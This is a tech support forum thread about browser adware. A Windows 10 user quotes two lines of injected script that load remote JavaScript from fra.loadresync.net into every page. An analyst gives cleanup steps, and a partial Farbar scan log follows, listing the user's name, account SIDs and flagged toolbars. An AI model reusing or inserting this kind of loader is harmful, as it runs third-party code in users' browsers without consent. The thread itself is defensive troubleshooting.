Go Back   Tech Support Forum > Security Center > Virus/Trojan/Spyware Help > Resolved HJT Threads

User Tag List

fra.loadresync.net adding lines of code to webpage

This is a discussion on fra.loadresync.net adding lines of code to webpage within the Resolved HJT Threads forums, part of the Tech Support Forum category. In my case I am using Firefox to create automated test cases. During this process is discovered fra.loadresync.net was running


 
 
Thread Tools Search this Thread
Old 09-15-2015, 07:59 AM   #1
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



In my case I am using Firefox to create automated test cases. During this process is discovered fra.loadresync.net was running a delaying my page loads and actions on a page, anytime the page went to gather information this site would be called. I have researched online and I find very little about this link. During my investigations I found that 2 new lines of code are being added to each page I visit using Firefox. This does not happen on any other browser I use on my computer. I am currently running Window 10. I have tried using Firefox's page blocking tools and I added a page blocking tool. None of this has helped. The blocking tool eventually blocked me from my own webpage I was trying to test. I have even uninstalled and reinstalled Firefox with no luck.

I have also run several malware tools with no help.

This following lines of code are being added to each page:

(function(d,c,s){ var b={};b.version='114';b.clientuid='03A144c388C33A1C';window._rvz=b;var a=d[c](s);a.src='//fra.loadresync.net/%73d/1060/1052.js';document.body.appendChild(a)})(document,'create'+'Element','script');

<script src="//fra.loadresync.net/%73d/1060/1052.js"></script>

I have worked with my developer, who is in another state, but this is not happening on his install of Firefox. I do not know where to go from here.
kfoxsr is offline  
Sponsored Links
Advertisement
 
Old 09-17-2015, 09:34 AM   #2
Security Team
Analyst
 
Larusso's Avatar
 
Join Date: Oct 2009
Location: Wels\ Austria
Posts: 729
OS: Win7 / Win 10 TechPreview



Hy and Welcome to TechSupportForum

My name is Daniel and I'll we be assisting you with your Malware related problems.
Before we move on, please read these few points carefully:
  • Before you start, please read my instructions completely. If there is anything you are not sure about, please ask before proceeding.
  • Follow the steps in the posted order. Sometimes one step requieres the previous one.
    As soon as something unexpected happens, stop there and tell me the exact nature of the problem as good as you can.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • My first language is not English, so please do not use slang or idioms. It could be hard for me to read.
  • Due the real life circumstances, I am not able to reply on Thursdays. If you do not hear from me within 48 hours, please send me a PM with a link to your topic.
  • Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.


Please tell me the tools ( as much as you remember ) you have used before asking here for assistance.


Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system.
If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.
  • Double-click to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
__________________
regards, Daniel


There will never be peace in a war so I don't understand what they are fighting for

ASAP & UNITE Member
Larusso is offline  
Old 09-17-2015, 12:48 PM   #3
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Results:
Additional scan result of Farbar Recovery Scan Tool (x64) Version:15-09-2015
Ran by Ken Terry (2015-09-17 14:15:07)
Running from C:\Users\Ken Terry\Downloads
Windows 10 Home (X64) (2015-08-12 00:52:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2815594105-2774959023-4293743994-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2815594105-2774959023-4293743994-503 - Limited - Disabled)
Guest (S-1-5-21-2815594105-2774959023-4293743994-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2815594105-2774959023-4293743994-1002 - Limited - Enabled)
Ken Terry (S-1-5-21-2815594105-2774959023-4293743994-1001 - Administrator - Enabled) => C:\Users\Ken Terry

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Internet Security (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Internet Security (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Internet Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.4.0.2710 - Adobe Systems Incorporated)
Adobe Dreamweaver CS5.5 (HKLM-x32\...\{0215A652-E081-4B09-9333-DC85AAB67FFA}) (Version: 11.5 - Adobe Systems Incorporated)
Adobe Dreamweaver CS6 (HKLM-x32\...\{A4ED5E53-7AA0-11E1-BF04-B2D4D4A5360E}) (Version: 12 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser.E7BED6E5DDA59983786DD72EBFA46B1598278E07.1) (Version: 2.0 Build 230 - Adobe Systems Incorporated.)
Amazon Kindle (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Amazon Kindle) (Version: - Amazon)
Amazon Music (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Amazon Amazon Music) (Version: 3.10.0.928 - Amazon Services LLC)
AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
AMD Catalyst Install Manager (HKLM\...\{14D58A97-B60E-A858-34D8-95469C02F7EC}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Antique Road Trip (x32 Version: 2.2.0.97 - WildTangent) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{7FE25256-B7C1-480D-B736-10A67A833AEA}) (Version: 3.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{B255D495-4734-4E9B-B4F5-96702FD4A7B9}) (Version: 3.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5D61F006-168C-4B8B-B7FD-F113C10AE0E4}) (Version: 8.2.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Problem Report Wizard (Version: 3.0.821.0 - ATI Technologies) Hidden
AVG PC Tuneup (HKLM-x32\...\{50316C0A-CC2A-460A-9EA5-F486E54AC17D}_is1) (Version: 10.0.0.27 - AVG)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Belkin USB Wireless Adaptor (HKLM-x32\...\InstallShield_{549CE1BD-88E4-4C5E-BF75-B155624714CC}) (Version: 1.0.0.10 - Belkin)
Belkin USB Wireless Adaptor (x32 Version: 1.0.0.10 - Belkin) Hidden
Big Fish Games: Game Manager (HKLM-x32\...\BFGC) (Version: 3.0.1.60 - )
Bing Bar (HKLM-x32\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
BodyMedia SYNC (HKLM-x32\...\InstallShield_{870BCBB7-1A28-4369-8327-466BD12D7E9D}) (Version: 2.0.5.90 - BodyMedia, Inc.)
BodyMedia SYNC (x32 Version: 2.0.5.90 - BodyMedia, Inc.) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
CadStd (HKLM-x32\...\CadStd) (Version: 3.7.5 - Apperson & Daughters)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Clip Art Collection (HKLM-x32\...\{158104AB-D92E-45BC-8268-5D351C95F6AD}) (Version: 1.0.0.0 - W3i)
Command & Conquer™ 4 Tiberian Twilight (HKLM-x32\...\{82696435-8572-4D8B-A230-D1AA567D0F0F}) (Version: 1.0.0.0 - Electronic Arts)
Command & Conquer™ and The Covert Operations™ (HKLM-x32\...\{050E298D-C9B8-4582-A332-26201268A297}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Command & Conquer™ Red Alert 2 and Yuri’s Revenge (HKLM-x32\...\{F5275D1C-D133-486D-8F07-D6C571F0A8EC}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Construction-Simulator 2012 - Demo version 1.0 (HKLM-x32\...\{1AD74AE8-6BF3-4B28-A0DD-A9503C39B5BE}_is1) (Version: 1.0 - weltenbauer. Software Entwicklung GmbH)
Crawler Toolbar (HKLM-x32\...\CToolbar_UNINSTALL) (Version: - Crawler, LLC) <==== ATTENTION
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.2823 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
DMUninstaller (HKLM-x32\...\DMUninstaller) (Version: - ) <==== ATTENTION
Dora's Carnival Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Doxillion Document Converter (HKLM-x32\...\Doxillion) (Version: 2.35 - NCH Software)
DriverFinder (HKLM-x32\...\DriverFinder) (Version: 2.0.4 - DeskToolsSoft)
Dropbox (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Dropbox) (Version: 3.8.8 - Dropbox, Inc.)
DVD Menu Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}) (Version: 4.1.4030 - Hewlett-Packard)
DVD Menu Pack for HP MediaSmart Video (x32 Version: 4.1.4030 - Hewlett-Packard) Hidden
EA Download Manager (HKLM-x32\...\EADM) (Version: 7.2.0.32 - Electronic Arts, Inc.)
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
EZ Cards Creator (HKLM-x32\...\{125110b6-fdfe-407f-a20e-a011b4f3e894}) (Version: 1.0.0 - W3i, LLC)
Facebook Messenger 2.1.4814.0 (HKLM-x32\...\{7204BDEE-1A48-4D95-A964-44A9250B439E}) (Version: 2.1.4814.0 - Facebook)
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Free Editor (HKLM\...\{1BF14E04-85DE-480C-9A04-EB36744C66B4}_is1) (Version: 1.0 - Grapefruit Software, LLC)
G3 Manager (HKLM-x32\...\{5672579F-D0BD-4960-BF29-0ADCAAB77286}) (Version: 1.2.7000 - DECA System)
G3 Manager (x32 Version: 1.2.7000 - DECA System) Hidden
GamesBar 2.0.1.81 (HKLM-x32\...\GamesBar) (Version: 2.0.1.81 - Oberon Media, Inc.)
GDR 3128 for SQL Server 2012 (KB2793634) (64-bit) (HKLM\...\KB2793634) (Version: 11.1.3128.0 - Microsoft Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.)
Google Drive (HKLM-x32\...\{12ADFB82-D5A3-43E4-B2F4-FCD9B690315B}) (Version: 1.24.9931.5480 - Google, Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.6710.2136 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
GoToMeeting 7.1.8.2553 (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\GoToMeeting) (Version: 7.1.8.2553 - CitrixOnline)
Grim Tales: The Bride (remove only) (HKLM-x32\...\Grim Tales: The Bride) (Version: - )
Halloween: Trick or Treat (x32 Version: 3.0.2.32 - WildTangent) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.4.12850.3526 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP MAINSTREAM KEYBOARD (HKLM-x32\...\{B40D7926-AE5F-41EA-8AC6-56C0E2F00E9D}) (Version: 1.4.3.0 - Hewlett-Packard)
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 4.1.4229 - Hewlett-Packard)
HP MediaSmart Music (HKLM-x32\...\InstallShield_{91A34181-9FAD-43AB-A35F-E7A8945B7E1C}) (Version: 4.1.4301 - Hewlett-Packard)
HP MediaSmart Photo (HKLM-x32\...\InstallShield_{6DAF8CDC-9B04-413B-A0F2-BCC13CF8A5BF}) (Version: 4.1.4211 - Hewlett-Packard)
HP MediaSmart SmartMenu (HKLM\...\{5B08AF35-B699-4A44-BB89-3E51E70611E8}) (Version: 3.1.1.12 - Hewlett-Packard)
HP MediaSmart Video (HKLM-x32\...\InstallShield_{D12E3E7F-1B13-4933-A915-16C7DD37A095}) (Version: 4.1.4214 - Hewlett-Packard)
HP MediaSmart/TouchSmart Netflix (HKLM-x32\...\{BDDA1E1E-204E-4368-B0C2-737F16B76307}) (Version: 1.0.3.0 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Officejet 6700 Basic Device Software (HKLM\...\{C0CA6788-386E-4BE1-B214-629E746A5302}) (Version: 25.0.619.0 - Hewlett-Packard Co.)
HP Officejet 6700 Help (HKLM-x32\...\{50DA41E2-0701-43E2-A8BB-FAA0CB64B28B}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6700 Product Improvement Study (HKLM\...\{0AACE096-CF1C-4FCE-BB60-6F3F914006C9}) (Version: 25.0.619.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.11352 - HP Photo Creations Powered by RocketLife)
HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP)
HP Setup (HKLM-x32\...\{72D90DB3-A16A-4545-B555-868471101833}) (Version: 8.1.4186.3400 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.2.27173 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
Hulu Desktop (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\HuluDesktop) (Version: 0.9.13 - Hulu LLC)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iCloud (HKLM\...\{709A2D23-C25E-47B5-9268-CB6FEE648504}) (Version: 4.1.1.53 - Apple Inc.)
Intel Driver Update Utility (HKLM-x32\...\{ca4bc3a8-b99c-4416-90d8-351a8ceab458}) (Version: 2.2.0.2 - Intel)
Intel(R) Driver Update Utility 2.2 (x32 Version: 2.2.0.1 - Intel) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.5.0.1026 - Intel Corporation)
Internet Explorer (Enable DEP) (HKLM\...\{a9264802-8a7a-40fe-a135-5c6d204aed7a}.sdb) (Version: - )
Internet Explorer Toolbar 4.8 by SweetPacks (HKLM-x32\...\{DD85D6BF-4787-4A93-99A5-3F0CF0AE8834}) (Version: 4.8.0000 - SweetIM Technologies Ltd.) <==== ATTENTION
iTunes (HKLM\...\{BFEAB774-C7DC-4032-B05A-DA5F7CB7B365}) (Version: 12.2.2.25 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java(TM) 6 Update 22 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216022F0}) (Version: 6.0.220 - Oracle)
Java(TM) 6 Update 29 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216023FF}) (Version: 6.0.290 - Oracle)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Jewel Quest 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.7.0 (Standard) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 8.7.0 - )
Kobo (HKLM-x32\...\Kobo) (Version: - )
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2823 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2823 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{46BA053F-57B3-4153-BDB6-D37EEC8B12D7}) (Version: 1.18.15.1 - LightScribe)
Margrave - The Curse of the Severed Heart (HKLM-x32\...\am-margravethecurseoftheseveredheart) (Version: - )
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft IntelliPoint 8.0 (HKLM\...\{563F041C-DFDB-437B-A1E8-E141E0906076}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office FrontPage 2003 (HKLM-x32\...\{91170409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Visio Professional 2003 (HKLM-x32\...\{91510409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Report Viewer 2012 Runtime (HKLM-x32\...\{9CCE40CE-A9E6-4916-8729-B008558EEF3F}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{83F2B8F4-5CF3-4BE9-9772-9543EAE4AC5F}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version: - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client (HKLM\...\{D411E9C9-CE62-4DBF-9D92-4CB22B750ED5}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Policies (HKLM-x32\...\{DC487E40-046E-42A9-9C7C-5D2B1A7EB211}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{8CB0713F-CFE0-445D-BCB2-538465860E1A}) (Version: 11.1.3128.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service (HKLM\...\{88CB5DFD-6CE1-486F-998C-9FC090FCE5E2}) (Version: 11.1.3128.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{54C5041B-0E91-4E92-8417-AAA12493C790}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{C3F6F200-6D7B-4879-B9EE-700C0CE1FCDA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{F1949145-EB64-4DE7-9D81-E6D27937146C}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - ENU (HKLM-x32\...\{D64B6984-242F-32BC-B008-752806E5FC44}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MixiDJ V33 Toolbar (HKLM-x32\...\MixiDJ_V33 Toolbar) (Version: 6.13.3.1 - MixiDJ V33) <==== ATTENTION
MONOPOLY (HKLM-x32\...\am-monopoly) (Version: - )
MONOPOLY (HKLM-x32\...\MONOPOLY) (Version: 1.1.1.0 - Pogo.com)
Monopoly City (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-118892567}) (Version: - Oberon Media)
Movie Theme Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 4.1.4030 - Hewlett-Packard)
Movie Theme Pack for HP MediaSmart Video (x32 Version: 4.1.4030 - Hewlett-Packard) Hidden
Mozilla Firefox 40.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 en-US)) (Version: 40.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Music Oasis (HKLM-x32\...\{c6c214df-2922-4809-94aa-f4d67d4451ec}) (Version: 1.0.0 - W3i, LLC)
Norton Internet Security (HKLM-x32\...\NIS) (Version: 22.5.2.15 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
OpenOffice.org 3.3 (HKLM-x32\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
Origin (HKLM-x32\...\Origin) (Version: 9.4.7.2799 - Electronic Arts, Inc.)
ParetoLogic FileCure (HKLM-x32\...\{C1C441C4-57FA-4950-BDBA-BABFBAA2AA39}) (Version: 1.1.2.0 - ParetoLogic, Inc.)
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 3.5.111 - PDF Complete, Inc)
PDF Reader (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\PDF Reader) (Version: - )
PDF Reader Packages (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\PDF Reader Packages) (Version: - ) <==== ATTENTION
